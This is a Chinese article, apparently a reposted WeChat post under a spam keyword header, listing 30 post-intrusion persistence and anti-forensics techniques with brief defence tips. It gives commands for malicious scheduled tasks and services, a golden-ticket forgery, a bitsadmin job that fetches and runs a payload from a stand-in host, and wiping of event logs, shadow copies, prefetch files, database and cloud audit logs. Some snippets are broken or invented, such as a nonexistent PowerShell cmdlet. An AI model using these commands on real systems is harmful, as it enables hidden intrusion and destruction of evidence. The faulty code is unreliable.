日韩欧美国产精品免费一二-日韩欧美国产精品亚洲二区-日韩欧美国产精品专区-日韩欧美国产另-日韩欧美国产免费看-日韩欧美国产免费看清风阁

在攻防對抗中，內網橫向移動后的權限維持與痕跡清理是決定攻擊能否長期隱蔽的關鍵環節。本文將系統解析30種高價值技巧，覆蓋Windows/Linux系統、域環境及常見服務，并提供對應的防御視角建議。

第一部分：權限維持15則

1. 1. 計劃任務偽裝
• ? 技術點：通過schtasks創建名稱類似系統服務（如MicrosoftEdgeUpdate）的定時任務，觸發后門執行。
• ? 操作：schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:\malware.exe" /sc hourly
• ? 防御：監控計劃任務中非微軟簽名的程序路徑。
2. 2. 服務注入
• ? 技術點：劫持合法服務（如Print Spooler）的二進制路徑指向惡意負載。
• ? 操作：sc config spooler binPath= "C:\Windows\System32\mal.dll"
• ? 防御：啟用服務簽名驗證（RequireSignedServiceBinaries）。
3. 3. 注冊表自啟動項
• ? 技術點：修改HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM對應項。
• ? 隱蔽性：使用CLSID混淆鍵名（如{AB3D1234-...}）。
• ? 防御：部署注冊表變更告警規則。
4. 4. 啟動文件夾植入
• ? 技術點：將惡意快捷方式（.lnk）放入%AppData%\Microsoft\Windows\Start Menu\Programs\Startup。
• ? 繞過：利用.url文件偽裝為合法文檔。
• ? 防御：限制用戶目錄寫入權限。
5. 5. WMI事件訂閱
• ? 技術點：注冊WMI事件過濾器（如用戶登錄觸發后門）。
• ? 腳本：

  $filterArgs = @{ EventNamespace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" }  
  $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }  

• ? 防御：定期審計__EventFilter/__EventConsumer類。
6. 6. 影子賬戶創建
• ? 技術點：通過注冊表添加隱藏賬戶（F值修改為0x3e9）。
• ? 操作：

  reg add "HKLM\SAM\SAM\Domains\Account\Users\000003E9" /v F /t REG_BINARY /d ...  

• ? 防御：檢查SAM中用戶RID是否連續。
7. 7. 黃金票據（Golden Ticket）
• ? 技術點：利用域控的KRBTGT哈希偽造TGT票據。
• ? 生成：

  kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt  

• ? 防御：定期重置KRBTGT密碼（每180天）。
8. 8. ACL后門
• ? 技術點：為關鍵進程（如LSASS.exe）添加調試權限。
• ? 操作：

  Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow  

• ? 防御：監控敏感進程的ACL變更。
9. 9. DLL劫持
• ? 技術點：替換系統目錄（如C:\Windows\System32\）中未簽名的DLL。
• ? 優先級：利用DLL搜索順序劫持應用程序。
• ? 防御：啟用DLL簽名強制驗證（CIG功能）。
10. 10. RID劫持攻擊
• ? 技術點：修改低權限用戶的RID為500（管理員RID）。
• ? 操作：通過mimikatz調整注冊表F字段。
• ? 防御：檢查用戶SID與RID的合法性。
11. 11. COM劫持
• ? 技術點：注冊惡意COM組件劫持MMC或Office調用鏈。
• ? 注冊表路徑：HKCR\CLSID\{...}\InprocServer32
• ? 防御：禁用未簽名的COM組件加載。
12. 12. Hook注入（API Hooking）
• ? 技術點：注入WS2_32.dll的connect函數實現網絡通信重定向。
• ? 工具：使用Detours庫實現函數劫持。
• ? 防御：啟用驅動簽名驗證（DSE）。
13. 13. Bits Jobs持久化
• ? 技術點：利用后臺智能傳輸服務（BITS）下載惡意負載。
• ? 命令：

  bitsadmin /create backdoor  
  bitsadmin /addfile backdoor http://mal.com/payload.exe C:\temp\svchost.exe  
  bitsadmin /SetNotifyCmdLine backdoor C:\temp\svchost.exe NULL  

• ? 防御：審核BITS任務列表。
14. 14. 域信任關系濫用
• ? 技術點：在跨域信任場景中利用SID History屬性提權。
• ? 操作：使用mimikatz添加域控的SID至用戶屬性。
• ? 防御：禁用不必要的域信任關系。
15. 15. Office宏持久化
• ? 技術點：在Normal.dotm模板中嵌入惡意宏代碼。
• ? 觸發：用戶啟動Word時自動執行。
• ? 防御：啟用宏執行限制（僅允許簽名宏）。

第二部分：痕跡清理15則

1. 16. Windows事件日志清除
• ? 工具：wevtutil cl Security（需管理員權限）。
• ? 對抗：使用內存注入技術直接操作eventlog.service進程。
• ? 防御：啟用日志轉發至SIEM系統。
2. 17. IIS日志擦除
• ? 路徑：C:\inetpub\logs\LogFiles\W3SVC1\。
• ? 技巧：僅刪除特定時間段的日志條目（避免全量刪除引發懷疑）。
• ? 防御：配置日志文件ACL為只讀。
3. 18. 防火墻規則恢復
• ? 操作：刪除新增的放行規則（netsh advfirewall firewall delete rule name="mal_rule"）。
• ? 隱蔽：復用已有規則名稱（如Remote Desktop）。
• ? 防御：基線化防火墻規則并監控變更。
4. 19. 文件時間戳偽造
• ? 工具：timestomp.exe -m "01/01/2020 08:00:00" malware.exe。
• ? 匹配：將時間戳與系統文件（如notepad.exe）保持一致。
• ? 防御：啟用文件完整性監控（FIM）。
5. 20. 內存痕跡清除
• ? 技術點：卸載惡意驅動后調用ExAllocatePool覆蓋內存區域。
• ? 工具：使用BOF（Beacon Object Files）實現無文件擦除。
• ? 防御：部署內存掃描工具（如Elastic Endpoint）。
6. 21. 回收站繞過刪除
• ? 命令：del /f /q /s *.*配合shift+delete徹底清除。
• ? 增強：使用cipher /w:C:覆寫磁盤空閑空間。
• ? 防御：審計敏感目錄的文件刪除操作。
7. 22. 預讀取文件清理
• ? 路徑：C:\Windows\Prefetch\中.pf文件。
• ? 操作：定期執行del /f /q C:\Windows\Prefetch\*.pf。
• ? 防御：禁用預讀取功能（需評估性能影響）。
8. 23. 卷影副本刪除
• ? 命令：vssadmin delete shadows /all /quiet。
• ? 對抗：在提權后優先刪除卷影防止取證恢復。
• ? 防御：限制vssadmin執行權限。
9. 24. RDP連接記錄清除
• ? 注冊表路徑：HKCU\Software\Microsoft\Terminal Server Client\Servers。
• ? 自動化：編寫腳本批量刪除歷史IP記錄。
• ? 防御：啟用RDP連接日志審計。
10. 25. 瀏覽器歷史痕跡清理
• ? 工具：使用BrowsingHistoryView導出并刪除Chrome/Firefox記錄。
• ? 進階：劫持瀏覽器擴展自動清理歷史（如惡意插件）。
• ? 防御：監控瀏覽器進程的異常行為。
11. 26. PowerShell日志繞過
• ? 技術點：通過-WindowStyle Hidden -ExecutionPolicy Bypass隱藏執行窗口。
• ? 日志清除：刪除Microsoft-Windows-PowerShell%4Operational.evtx。
• ? 防御：啟用模塊日志記錄（ScriptBlockLogging）。
12. 27. WMI日志清理
• ? 路徑：Applications and Services Logs\Microsoft\Windows\WMI-Activity。
• ? 難點：需停止Winmgmt服務后操作日志文件。
• ? 防御：啟用WMI活動審計策略。
13. 28. Linux utmp/wtmp清理
• ? 文件：/var/run/utmp、/var/log/wtmp。
• ? 命令：使用utmpdump工具編輯登錄記錄。
• ? 防御：配置ttylog實時記錄會話內容。
14. 29. 數據庫日志截斷
• ? MySQL：PURGE BINARY LOGS BEFORE '2024-01-01';
• ? MSSQL：執行EXEC sp_cycle_errorlog;循環日志文件。
• ? 防御：啟用數據庫審計并異地存儲日志。
15. 30. 云平臺日志覆蓋
• ? AWS：通過DeleteLogGroup刪除CloudTrail日志組。
• ? Azure：使用Remove-AzLogProfile清除活動日志配置。
• ? 防御：啟用云日志不可變性（Immutable Storage）。

防御方建議

• ? 權限維持檢測：部署EDR監控進程樹異常、注冊表關鍵路徑變更及服務簽名異常。
• ? 痕跡清理對抗：實施日志多副本存儲（本地+云端+物理設備），使用AI分析日志完整性。
• ? 紅隊驗證：定期模擬攻擊驗證防御體系有效性，重點關注上述30項技術的防護盲區。

閱讀原文：https://mp.weixin.qq.com/s/KHNbBR3WAjDGaLGvRZoUwQ